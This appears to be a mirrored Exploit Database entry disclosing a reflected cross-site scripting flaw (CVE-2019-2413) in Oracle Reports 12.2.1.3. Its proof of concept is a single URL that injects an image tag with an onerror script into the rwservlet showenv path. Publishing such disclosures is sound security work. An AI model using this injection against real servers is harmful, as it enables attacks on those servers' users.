Oracle Reports Developer Component 12.2.1.3 – Cross-site Scripting

• Exploit Database
• 21 阅读

• 作者： Mohamed M.Fouad
  日期： 2019-01-17
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46187/

• # Exploit Title: [Cross-site Scripting (XSS)]
  # Date: [2019-01-15]
  # Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
  # Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
  # Version: [12.2.1.3] (REQUIRED)
  # Tested on: [Windows 10]
  # CVE : [CVE-2019-2413]
  
  POC:
  
  https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E